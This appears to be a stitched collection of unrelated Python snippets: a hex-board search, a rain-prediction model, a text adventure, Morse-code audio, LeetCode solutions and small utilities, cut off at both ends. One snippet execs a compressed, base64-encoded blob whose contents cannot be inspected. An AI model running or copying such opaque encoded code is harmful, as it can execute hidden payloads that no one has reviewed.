return cls(red=red, green=green, blue=blue, alpha=alpha)
@classmethod
def fromRGBA(cls, red, green, blue, alpha):
return cls(red=red, green=green, blue=blue, alpha=alpha)
|
"""
COMP30024 Artificial Intelligence, Semester 1, 2021
Project Part A: Searching
This script contains the entry point to the program (the code in
`__main__.py` calls `main()`). Your solution starts here!
"""
import itertools
import json
import sys
from classes.Hex import *
from classes.RouteInfo import RouteInfo
from search.BFS import bfs
from search.util import *
visited = []
def main():
try:
with open(sys.argv[1]) as file:
data = json.load(file)
except IndexError:
print("usage: python3 -m search path/to/input.json", file=sys.stderr)
sys.exit(1)
board_dict = create_board(data)
print_board(board_dict, compact=True)
routes = getAllRoutes(data, board_dict)
def getAllRoutes(data, board_dict, show_routes=True):
sources = data["upper"]
destinations = data["lower"]
src_dst_pairs = []
routes = []
for src, dst in itertools.product(sources, destinations):
src_hex = Hex(Coord(src[1], src[2]), getEnumByName(src[0], Token))
dst_hex = Hex(Coord(dst[1], dst[2]), getEnumByName(dst[0], Token))
if src_hex.token.battle(dst_hex.token):
src_dst_pairs.append([src_hex, dst_hex])
routes.append(RouteInfo(src_hex, dst_hex, bfs(src_hex, dst_hex.coord, board_dict, visited).extractRoute()))
# sort rule implemented in RouteInfo class
routes.sort()
if show_routes:
for i in routes:
print(f"{i.src_hex.coord.toTuple()} to {i.dst_hex.coord.toTuple()}\n"
f"Route: {i.route} length {len(i.route)}")
return routes
states = [
{
(0, 0): "hello",
(0, 2): "world",
(3, -2): "(p)",
(2, -1): "(S)",
(-4, 0): "(R)",
},
{
(0, 1): "hello",
(0, 2): "world",
(3, -2): "(p)",
(2, -1): "(S)",
(-4, 0): "(R)",
},
{
(0, 2): "hello",
(0, 2): "world",
(3, -2): "(p)",
(2, -1): "(S)",
(-4, 0): "(R)",
}
]
#visualize_test(states, 0.4)
# test()
|
#===============================================================================
# import math
# import re
# print (int(math.fmod(43,45)))
# print (22/3)
# w = "Hello World"
# print (w[-1])
#
# print("Yes") if '26-03-2017' > '29-12-2016' else print("No")
#
# st = "asd_fd"
#
# print("Valid") if re.match("^[a-zA-Z.0-9_-]*$",st ) else print("Not valid")
# print("Valid") if re.match("^[a-zA-Z0-9]*$", st[-1]) else print("Not valid")
#
# list1 = ["mon","tue","wed","thu","fri","sat"]
# tuple1 = tuple(list1)
#
# print(list1.count("n"))
# print(tuple1.count("n"))
#===============================================================================
#import datetime
#print(datetime.datetime.strptime("25-12-2018","%d-%m-%Y"))
openList = ["[","{","("]
closeList = ["]","}",")"]
def balance(myStr):
stack= []
for i in myStr:
if i in openList:
stack.append(i)
print(stack)
# if i in openList and i == "{":
# return False
# break
elif i in closeList:
pos = closeList.index(i)
if ((len(stack) > 0) and (openList[pos] == stack[len(stack)-1])):
stack.pop()
else:
return False
if len(stack) == 0:
return True
str_input = str(input())
test_balance = balance(str_input)
if test_balance:
print("Valid")
else:
print ("Invalid")
|
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import warnings
from category_encoders import OrdinalEncoder
from sklearn.experimental import enable_iterative_imputer
from sklearn.impute import IterativeImputer
from sklearn.linear_model import LinearRegression
from sklearn.ensemble import RandomForestClassifier
from xgboost import XGBClassifier
from sklearn.pipeline import Pipeline
from sklearn.model_selection import train_test_split
from imblearn.over_sampling import SMOTE
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import RandomizedSearchCV
import numpy as np
from sklearn.metrics import accuracy_score
from sklearn.metrics import plot_confusion_matrix
from sklearn.metrics import roc_auc_score
from sklearn.metrics import roc_curve
from sklearn.preprocessing import StandardScaler
import pickle
import os
warnings.filterwarnings('ignore')
os.chdir("F:\Deploy Australia Weather Prediction")
print(os.getcwd())
df = pd.read_csv("F:\\Project CSV's\\weatherAUS.csv")
print(df.head())
print(len(df['Location'].unique()))
for i in df['WindGustDir'].unique():
print(f'<option value="{i}">')
df.shape
df.info()
df.isna().sum()
thresholdmissing = (df.shape[0]*25)/100
df['MinTemp'].isna().sum()
for i in df.columns:
if df[i].isna().sum()>thresholdmissing:
df = df.drop([i],axis=1)
df.shape
df.head()
df = df.drop(['Date'],axis=1)
df.head()
df['Humidity'] = (df['Humidity9am']+df['Humidity3pm'])/2
df['Pressure'] = (df['Pressure9am']+df['Pressure3pm'])/2
df['Temp'] = (df['Temp9am']+ df['Temp3pm'])/2
df.columns
df = df.drop(['WindDir9am', 'WindDir3pm', 'WindSpeed9am','WindSpeed3pm', 'Humidity9am',
'Humidity3pm', 'Pressure9am','Pressure3pm', 'Temp9am', 'Temp3pm'],axis=1)
df.head()
df.isna().sum()
# Commented out IPython magic to ensure Python compatibility.
# %matplotlib qt
sns.countplot(df['Location'])
plt.xticks(rotation=90)
plt.plot()
df['Location'].unique()
df['Location'].replace('SydneyAirport','Sydney',inplace=True)
df['Location'].replace('MelbourneAirport','Melbourne',inplace=True)
df['Location'].replace('PerthAirport','Perth',inplace=True)
df['Location'].unique()
# Commented out IPython magic to ensure Python compatibility.
# %matplotlib qt
sns.countplot(df['Location'])
plt.xticks(rotation=90)
plt.plot()
df.isna().sum()
df['WindGustDir'].unique()
sns.countplot(df['WindGustDir'])
plt.xticks(rotation=90)
plt.plot()
df['WindGustDir'].value_counts()
df['RainToday'].unique()
sns.countplot(df['RainToday'])
sns.countplot(df['RainTomorrow'])
df['RainTomorrow'].value_counts()
df.shape[0]*0.30
df.head()
df = df[~(df['RainTomorrow'].isna())]
df = df[~(df['RainToday'].isna())]
df = df[~(df['WindGustDir'].isna())]
df.isna().sum()
df.shape
df['RainTomorrow'].value_counts()
df = df.reset_index()
df = df.drop(['index'],axis=1)
df.head()
raintom = {'No':0,
'Yes':1}
df['RainTomorrow'] = df['RainTomorrow'].map(raintom)
df.head()
df['RainTomorrow'].unique()
dfloc = df.groupby(df['Location'])['RainTomorrow'].mean().to_dict()
df['Location']=df['Location'].map(dfloc)
print(dfloc)
df.head()
dfdir = df.groupby(df['WindGustDir'])['RainTomorrow'].mean().to_dict()
print(dfdir)
df['WindGustDir']=df['WindGustDir'].map(dfdir)
df.head()
dftoday = df.groupby(df['RainToday'])['RainTomorrow'].mean().to_dict()
print(dftoday)
df['RainToday']=df['RainToday'].map(dftoday)
df.head()
df = df.drop(['MinTemp','MaxTemp'],axis=1)
df.head()
df.isna().sum()
estimator = LinearRegression()
imp = IterativeImputer(estimator,max_iter=100)
dfnew = imp.fit_transform(df)
dfnew = pd.DataFrame(dfnew,columns = df.columns)
dfnew.isna().sum()
x = dfnew.drop(['RainTomorrow'],axis=1)
y = dfnew[['RainTomorrow']]
print(x['Location'].unique)
y.head()
print(x.columns)
y['RainTomorrow'] = df['RainTomorrow'].astype('category')
train_x,test_x,train_y,test_y = train_test_split(x,y,test_size=0.3,random_state=42)
train_x.shape,test_x.shape,train_y.shape,test_y.shape
sm = SMOTE(random_state=42)
train_x_sm,train_y_sm = sm.fit_resample(train_x,train_y)
train_y_sm.value_counts()
model = XGBClassifier(n_estimators=350,subsample =1.0,max_depth=6,learning_rate=0.12244897959183673,
gamma=8,colsample_bytree=0.8,booster='gbtree')
model.fit(train_x_sm,train_y_sm)
pred_train = model.predict(train_x)
pred_test = model.predict(test_x)
print(accuracy_score(pred_train,train_y))
print(accuracy_score(pred_test,test_y))
pickle.dump(model,open('AusWeather.pkl','wb'))
AusWeather = pickle.load(open('AusWeather.pkl','rb'))
|
from sys import exit # importing the exit feature from system
def gold_room(): # defines the function for the gold room
print "This room is full of gold. How much do you take?" # ask for user input
next = raw_input("> ") # collects user inputs
if "0" in next or "1" in next: # creates conditions for user inputs to run if..
how_much = int(next) # collects a integer or number
else:
dead("Man, learn to type a number.") # this prints if user does not put in 0 or 1 number
if how_much < 50: # creates condition for user inputs for how much if it is less than 50
print "Nice, you're not greedy, you win!"
exit(0) # this exits the loop and stops
else: # if users how much is more than 50 it prints
dead("You greedy bastard!")
def bear_room(): # defines a function for bear_room
print "There is a bear here."
print "The bear has a bunch of honey."
print "The fat bear is in front of another door."
print "How are you going to move the bear?"
# need more clarity on the relevance of the bear_moved expression
bear_moved = False # set bear_moved false creates boolean test
while True: # creates while loop for users input how they are moving the bear creates an infinite loop for this
#until it reaches a false. or when they enter a correct option.
next = raw_input("> ") # collects user input
if next == "take honey": # creates condition to move bear
dead("The bear looks at you then slaps your face off") # prints and calls dead function (Good Job!)
elif next == "taunt bear" and not bear_moved: # creates condition if taunt bear and true (not false)
print ("The bears has moved from the door. You can go through it now")
bear_moved = True # reassigns bear_moved to True
elif next == "taunt bear" and bear_moved: # if you taunt bear and bear moved true then
dead("The bear gets pissed off and chews your leg off.")
elif next == "open door" and bear_moved: # if user opens door and bear moves then they start gold_room
gold_room()
else: # if none of the user input applies then type
print " I got no idea what that means"
def cthulhu_room(): # defines a new function for cthulhu to run when called
print "Here you see the great evil Cthulhu."
print "He, it, whatever stares at you and you go insane"
print "Do you flee for your life or eat your head?"
next = raw_input("> ")
if "flee" in next: # if user is flee then it goes to start function
start()
elif "head" in next: # if user inputs is head it prints dead value and well that ...
dead("Well that was tasty!")
else: # if user chooses neither then it calls cthulhu function to run again
cthulhu_room()
# not sure of the relevance of this function
def dead(why): # creates a function to be called
print why, "Good Job!" # it prints good job
exit(0) # and it exits.
def start(): # this is the start function to start and run the program
print "You are in a dark room."
print "There is a door to your right and left."
print "Which one do you take?"
next = raw_input("> ") # takes user input
if next == "left": # conditions for user input
bear_room() # if they choose left it will loop to the bear_room function
elif next == "right": # if they choose right it loops to cthulhu_room function
cthulhu_room()
else: # if they choose neither and something else then it runs dead and ends.
dead("You stumble around the room until you starve.")
start() # this calls the whole game to run from start and runs through functions and loops
""" study drill
1. map of the game
start - begins the game and ask for options which door
through room: bear room or cthulu room or gold rooms with what happens.
2. fixed mistakes
3. written comments two items i don't quite understand is the necessity for the dead function,
and the bear_moved expression
4.
5. the bugs in typing a number with 0 or 1 in the gold room are that if you do numbers without it will keep saying
it doesn't understand what that means. """ |
from nltk.tokenize import sent_tokenize
with open('sentence1.txt', 'r') as myfile:
data = myfile.read().replace('\n', '')
sentences = sent_tokenize(data, language="german")
for s in sentences:
print(s)
first_sentence = sentences[0]
print(first_sentence.split())
from nltk.tokenize import word_tokenize, regexp_tokenize, wordpunct_tokenize, blankline_tokenize
print(word_tokenize(first_sentence))
print(regexp_tokenize(first_sentence, pattern='\w+'))
print(wordpunct_tokenize(first_sentence))
print(blankline_tokenize(first_sentence))
|
n=int(input())
ip=input().split()
lsb=list()
num=list()
for i in range(n):
num.append(int(ip[i]))
lsb.append(num[i] and -num[i])
print(lsb)
|
# -*- coding: utf-8 -*-
#leetcode 454
'''
给定四个包含整数的数组列表 A , B , C , D ,
计算有多少个元组 (i, j, k, l) ,使得 A[i] + B[j] + C[k] + D[l] = 0。
时间复杂度:O(n2)+O(n2)=O(n2)
空间复杂度:O(n2)
'''
def FourSum2(A,B,C,D):
hashAB={}
res=0
for a in A:
for b in B:
ab=a+b
if ab in hashAB:
hashAB[ab]+=1
else:
hashAB[ab]=1
for c in C:
for d in D:
cd=c+d
if -cd in hashAB:
res+=hashAB[-cd]
return res
'''
利用库函数法2
'''
import collections
def FourSum22(A,B,C,D):
hashAB=collections.Counter(a+b for a in A for b in B)
res=sum(hashAB.get(-c-d,0) for c in C for d in D)
return res
A,B,C,D=[1,2],[-2,-1],[-1,2],[0,2]
res=FourSum2(A,B,C,D) |
report_url = "https://app.powerbi.com/groups/9ff0ac9f-8a38-42e9-be4b-d354a48bc434/reports/12c61b06-ddd8-40c6-ac2c" \
"-c95bc06fd1dc/ReportSectionce36125dc6ab5c85d025 "
report_title = "60+ Delinquency Report"
home_equity_report_title = "Home Equity Analysis"
exe_path = "../drivers/chromedriver.exe"
|
import zlib, base64
exec(zlib.decompress(base64.b64decode('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')))
# Created by pyminifier (https://github.com/liftoff/pyminifier)
|
f = open("../data/steam-200k_final.csv","r")
write_to = open("../data/vg_data_FIM.csv","w")
user_id = -1
string = ""
i = 0
for line in f:
if i == 0:
i += 1
continue
d = line.split('\n')[0].split(',')
print "Curr User_ID: " + str(user_id)
print "Curr Line's User_ID: " + d[0]
if user_id != int(d[0]) and user_id != -1:
print "Writing to file..."
write_to.write(string[:-1] + "\n")
user_id = int(d[0])
string = d[1] + ","
else:
user_id = int(d[0])
if d[1] not in string:
string += d[1] + ","
print "String: " + string |
from django.contrib import admin
from .models import CarrierTracker
admin.site.register(CarrierTracker)
|
def greeting():
"""Documented Created by: Ioannis Tziokas"""
print("Hello")
def add(a,b):
"""Sum of two numbers"""
c=a+b
return c
#action with multple actions
def addMultiply(a,b):
return a+b, a*b
greeting()
x=add(1,2)
x2 = addMultiply(2,3)
print(x)
x3=add([1,3],[4,3])
print(x3)
print(sorted(x3))
print(x2)
print(type(x))
print(greeting.__doc__) |
KEYWORD = 'keyword'
KEYWORDS = 'keywords'
ITEM_TYPE = "item_type"
CONTAINED_BY = "contained_by"
FED_BY = 'fed_by'
CONTAINS = 'contains'
FEEDS = "feeds" |
words = ['gallery', 'recasts', 'casters', 'marine', 'bird', 'largely', 'actress', 'remain', 'allergy']
def find_anagrams(list):
new = {}
#key should store strings from input list with letters sorted alphabetically
for word in list:
key = ''.join(sorted(word))
if key not in new:
new[key] = [] #set the key in alphabet order and equal to an empty list for value
new[key].append(word)
#value should contain a list of words from the input list which are anagrams for the given key
return new
#alternative method using get() method
def find_anagrams2(list):
new = {}
#key should store strings from input list with letters sorted alphabetically
for word in list:
key = ''.join(sorted(word))
new[key] = new.get(key, []) + [word]
return new
#print(''.join(sorted(words[0])))
print(find_anagrams2(words)) |
import pyaudio
import struct
import math
import time
import soundfile
import copy
import wave
FORMAT = pyaudio.paInt16
CHANNELS = 1
RATE = 44100
TONE = 700
TIMEPERIOD = 0.30
PARIS = 40
MIN = 60
p = pyaudio.PyAudio()
morse = {
"a": "*-",
"b": "-***",
"c": "-*-*",
"d": "-**",
"e": "*",
"f": "**-*",
"g": "--*",
"h": "****",
"i": "**",
"j": "*---",
"k": "-*-",
"l": "*-**",
"m": "--",
"n": "-*",
"o": "---",
"p": "*--*",
"q": "--*-",
"r": "*-*",
"s": "***",
"t": "-",
"u": "**-",
"v": "***-",
"w": "*--",
"x": "-**-",
"y": "-*--",
"z": "--**",
"1": "*----",
"2": "**---",
"3": "***--",
"4": "****-",
"5": "*****",
"6": "-****",
"7": "--***",
"8": "---**",
"9": "----*",
"0": "-----"
}
def get_time_period(wpm):
timeperiod = MIN/(PARIS * wpm)
return timeperiod
def save_wav(filename, morsecode):
# Save the recorded data as a WAV file
frames = get_morse_frame(morsecode)
wf = wave.open(filename, 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(2)
wf.setframerate(RATE)
value = bytearray(frames)
wf.writeframes(value) #('b'.join(frames))
wf.close()
print("Save the morse code audo to " + filename)
def data_for_offtime(time):
frame_count = int(RATE * time)
remainder_frames = frame_count % RATE
wavedata = []
for i in range(frame_count):
wavedata.append(0)
#for i in range(remainder_frames):
# wavedata.append(0)
number_of_bytes = str(len(wavedata))
wavedata = struct.pack(number_of_bytes + 'h', *wavedata)
return wavedata
def data_for_freq(frequency, time):
"""get frames for a fixed frequency for a specified time or
number of frames, if frame_count is specified, the specified
time is ignored"""
#RATE = 44100
#TONE = 700 #400
#TIMEPERIOD = 0.30
frame_count = int(RATE * time)
remainder_frames = frame_count % RATE
wavedata = []
for i in range(frame_count):
a = RATE / frequency # number of frames per wave
b = i / a
# explanation for b
# considering one wave, what part of the wave should this be
# if we graph the sine wave in a
# displacement vs i graph for the particle
# where 0 is the beginning of the sine wave and
# 1 the end of the sine wave
# which part is "i" is denoted by b
# for clarity you might use
# though this is redundant since math.sin is a looping function
# b = b - int(b)
c = b * (2 * math.pi)
# explanation for c
# now we map b to between 0 and 2*math.PI
# since 0 - 2*PI, 2*PI - 4*PI, ...
# are the repeating domains of the sin wave (so the decimal values will
# also be mapped accordingly,
# and the integral values will be multiplied
# by 2*PI and since sin(n*2*PI) is zero where n is an integer)
d = math.sin(c) * 32767
e = int(d)
wavedata.append(e)
#for i in range(remainder_frames):
# wavedata.append(0)
number_of_bytes = str(len(wavedata))
wavedata = struct.pack(number_of_bytes + 'h', *wavedata)
return wavedata
def get_morse_frame(morsecode):
global TONE, TIMEPERIOD
morseframes = []
for x in morsecode:
if(x == "*"):
#play(TONE, TIMEPERIOD)
frames = data_for_freq(TONE, TIMEPERIOD)
morseframes.extend(frames)
frames = data_for_offtime(TIMEPERIOD)
elif(x == "-"):
#play(TONE, TIMEPERIOD * 3)
frames = data_for_freq(TONE, TIMEPERIOD * 3)
morseframes.extend(frames)
frames = data_for_offtime(TIMEPERIOD)
elif(x == " "):
#time.sleep(TIMEPERIOD * 3)
frames = data_for_offtime(TIMEPERIOD * 3)
morseframes.extend(frames)
return morseframes
def play(frequency, time):
"""
play a frequency for a fixed time!
"""
frames = data_for_freq(frequency, time)
stream = p.open(format=FORMAT, channels=CHANNELS, rate=RATE, output=True)
stream.write(frames)
stream.stop_stream()
stream.close()
def play_morse(morsecode):
""" used to play tone that represent the morsecode"""
global TONE, TIMEPERIOD
for x in morsecode:
if(x == "*"):
play(TONE, TIMEPERIOD)
time.sleep(TIMEPERIOD)
elif(x == "-"):
play(TONE, TIMEPERIOD * 3)
time.sleep(TIMEPERIOD)
elif(x == " "):
time.sleep(TIMEPERIOD * 3)
def to_string(mcode):
""" convert morsecode to text"""
morsetext = ""
wordlist = getwords(mcode)
for word in wordlist:
letterlist = getletters(word)
for letters in letterlist:
str1 = getword(letters)
morsetext += str1
morsetext += " "
return morsetext
def getword(mcode):
""" Convert a word in morse to regular text"""
global morse
morsetext = ""
for k, v in morse.items():
if(v == mcode):
morsetext += k
return morsetext
def getletters(mcode):
""" Get a list of morsecode from a string of mcode split by space"""
letterlist = mcode.split(" ")
return letterlist
def getwords(mcode):
""" Get a list of words from a morsecode from a string split by double spaces"""
wordlist = mcode.split(" ")
wordlist = stripword(wordlist)
return wordlist
def stripword(word):
""" Split whitespace from a word """
for x in range(len(word)):
word[x] = word[x].strip()
return word
def to_morse(mcode):
""" Convert text to morse code """
global morse
mcode = mcode.lower()
morsetext = ""
for x in mcode:
if(x == " "):
morsetext += " "
else:
morsetext += morse[x] + " "
return morsetext
def gettiming(process_list, typetiming):
"""
Used to get a sort set for different duration needed to conver to
morse code.
"""
timing = []
for x in process_list:
if(x[0] == typetiming):
timing.append(x[3])
timing = set(timing)
return sorted(timing)
def fixzerocrossing(sample_list, sample_rate):
"""
Walk through the sample list and find duration of a tone or absence of tone
Adjust the list by taking into account zero crossing points of a single(tone)
"""
state = 0
process_list = []
for x in range(len(sample_list)):
if(sample_list[x][3] == 0.0 and state == 0):
state = 1
sample_start = sample_list[x][1]
elif(sample_list[x][3] > 0.01 and state != 1): #!= 0.0 and state != 1): # add fix here
process_list.append(sample_list[x])
elif(sample_list[x][0] == 'off' and state == 1 and sample_list[x][3] > 0.002): # 9.049773755656108e-05): #!= 0.0):
sample_stop = sample_list[x - 1][2]
duration = getduration(sample_start, sample_stop, sample_rate)
list1 = ["on", sample_start, sample_stop, duration]
process_list.append(list1)
process_list.append(sample_list[x])
state = 0
elif(x + 1 == len(sample_list) and sample_list[x-1][0] == 'off'):
sample_stop = sample_list[x][2]
duration = getduration(sample_start, sample_stop, sample_rate)
list1 = ["on", sample_start, sample_stop, duration]
process_list.append(list1)
return process_list
def getsamples(audio_samples, sample_rate):
"""
Walk through the audio data and convert it to a list that can be process
For each tone find its duration by finding the number of sample for the tone
and using it find duration and also categories each input as 'on' or 'off'
based on rather it is a tone or absent of a tone
"""
state = 0
sample_list = [] # [start, stop, duration]
sample_start = 0
sample_stop = 0
for x in range(len(audio_samples)):
if(audio_samples[x] != float(0)):
if(state == 0):
sample_start = x
state = 1
elif(state == 2):
sample_stop = x - 1
duration = getduration(sample_start, sample_stop, sample_rate)
list1 = ["off", sample_start, sample_stop, duration]
sample_list.append(list1)
sample_start = x
state = 1
elif(audio_samples[x] == 0):
if(state == 0):
sample_start = x
state = 2
elif(state == 1):
sample_stop = x - 1
duration = getduration(sample_start, sample_stop, sample_rate)
list1 = ["on", sample_start, sample_stop, duration]
sample_list.append(list1)
sample_start = x
state = 2
return sample_list
def getduration(sample_start, sample_stop, sample_rate):
""" Get the duration of a tone sample"""
number_samples = sample_stop - sample_start
duration = number_samples/sample_rate
return duration
def delleadingoff(process_list):
""" if the first input of the process list is 'off' delete it"""
if (process_list[0][0] == 'off'):
del process_list[0]
return process_list
def sound2morse(process_list, timing, spacing):
""" loop through the process list and convert it to morse code"""
morsecode = ""
for x in process_list:
if(x[0] == 'on'):
if(timing[0] == x[3]):
morsecode +="*"
else:
morsecode +="-"
else:
if(spacing[1] == x[3]):
morsecode += " "
elif(spacing[0] == x[3]):
pass
else:
morsecode += " "
return morsecode
def postprocesstiming(timingval):
'''
[0.07656108597285068, 0.07683257918552036, 0.07656108597285068, 0.6114932126696833, 1.6805429864253394]
[0.07656108597285068, 0.07656108597285068, 0.6112217194570135, 0.6112217194570135, 1.6805429864253394]
'''
list1 = []
for x in range(len(timingval)):
for y in range(len(timingval)):
z = timingval[x] / timingval[y]
if(z > 0.9 and z < 1.1):
#list1.append(timingval[x])
timingval[y] = timingval[x]
#print("timingval - ", timingval)
return timingval
def postprocess(process_list, timing, spacing, timing1, spacing1):
"""
timing might not be exact thus, if two inputs are with 90% (.9 and 1.1)
of each other then they are considered the same as far as timing
walk through the process list and adjust accordingly
"""
for x in range(len(process_list)):
if(process_list[x][0] == 'on'):
for y in range(len(timing)):
if(timing[y] == process_list[x][3]):
process_list[x][3] = timing1[y]
break
else:
for y in range(len(spacing)):
if(spacing[y] == process_list[x][3]):
process_list[x][3] = spacing1[y]
return process_list
def soundinfo():
file_path = 'test3morse.wav'
print('Open audio file path:', file_path)
audio_samples, sample_rate = soundfile.read(file_path, dtype='int16')
number_samples = len(audio_samples)
print('Audio Samples: ', audio_samples)
print('Number of Sample', number_samples)
print('Sample Rate: ', sample_rate)
# duration of the audio file
duration = round(number_samples/sample_rate, 2)
print('Audio Duration: {0}s'.format(duration))
sample_list = getsamples(audio_samples, sample_rate)
process_list = fixzerocrossing(sample_list, sample_rate)
process_list = delleadingoff(process_list)
spacing = gettiming(process_list, 'off')
timing = gettiming(process_list, 'on')
spacing1 = copy.deepcopy(spacing)
timing1 = copy.deepcopy(timing)
spacing1 = postprocesstiming(spacing1 )
timing1 = postprocesstiming(timing1)
process_list = postprocess(process_list, list(timing), list(spacing), timing1, spacing1)
spacing1 = sorted(set(spacing1))
timing1 = sorted(set(timing1))
morsecode = sound2morse(process_list, list(timing1), list(spacing1))
morsetext = to_string(morsecode)
#print("sample list => ", sample_list)
print("\n")
print("process list => ", process_list)
print("\n")
print("spacing list => ", spacing)
print("timing list => ", timing)
print("spacing1 list => ", spacing1)
print("timing1 list => ", timing1)
print("morse code => ", morsecode)
print("morse text => ", morsetext)
def printsamples(startsample, stopsample, audio_samples):
for x in range(startsample, stopsample):
print("audio_samples[x] ", audio_samples[x])
print("x - ", x)
def main():
""" The main programming entry"""
# -- *- - - **** * *-- --* *-* *- -* - matthew Grant
# -... .. --. -.-. .- - big cat
# *--* *- *-* ** *** paris => * X 10 : _ X 4 (12) : "" X 9 : " " X 3(9) == 40
# wpm => paris = 40 timeperiods => 40 X W X sec = wpm :
# example: paris * 5 = 5wpm: paris = 5wpm => 0.025 = 1/40
# time 40 = wpm => 1/40 wpm = timeperiod => 60/40 = time(sec)
teststr = "paris"
print("test string - ", teststr)
morse_code = to_morse(teststr)
morse_text = to_string(morse_code)
print("morsecode => ", morse_code)
print("text => ", morse_text)
play_morse(morse_code)
#soundinfo()
#save_wav("cat5wpm1000.wav", morsecode)
if __name__ == "__main__":
main() |
from .evdev import get_devices as evdev_get_devices
from .evdev import get_joysticks
from .evdev import get_controllers
from .evdev import EvdevControllerManager as ControllerManager
from .x11_xinput_tablet import get_tablets
from .x11_xinput import get_devices as x11xinput_get_devices
def get_devices(display=None):
return evdev_get_devices(display) + x11xinput_get_devices(display)
|
from numpy import std
class BreakException(Exception):
pass
class EarlyStop(object):
def __init__(self):
self.list_loss = []
self.best_model = None
def get_best_model(self):
return self.best_model[0]
def check(self, loss, model, patience=10):
self.list_loss.append(loss)
if self.best_model is None:
self.best_model = [model, loss]
if self.list_loss[-1] < self.best_model[1]:
self.best_model = [model, loss]
if len(self.list_loss) == patience:
std_value = std(self.list_loss)
self.list_loss = []
if std_value == 0:
raise BreakException()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
class TorextException(Exception):
def __init__(self, message=''):
if isinstance(message, str):
message = message.decode('utf8')
self.message = message
def __str__(self):
return unicode(self).encode('utf-8')
def __unicode__(self):
return self.message
# route.py
class URLRouteError(TorextException):
"""error in router"""
# make_settings.py
class SettingsError(TorextException):
pass
# app.py
class ArgsParseError(TorextException):
pass
# script.py
class CommandArgumentError(TorextException):
pass
|
# 13. Roman to Integer
class Solution:
def romanToInt(self, s: str) -> int:
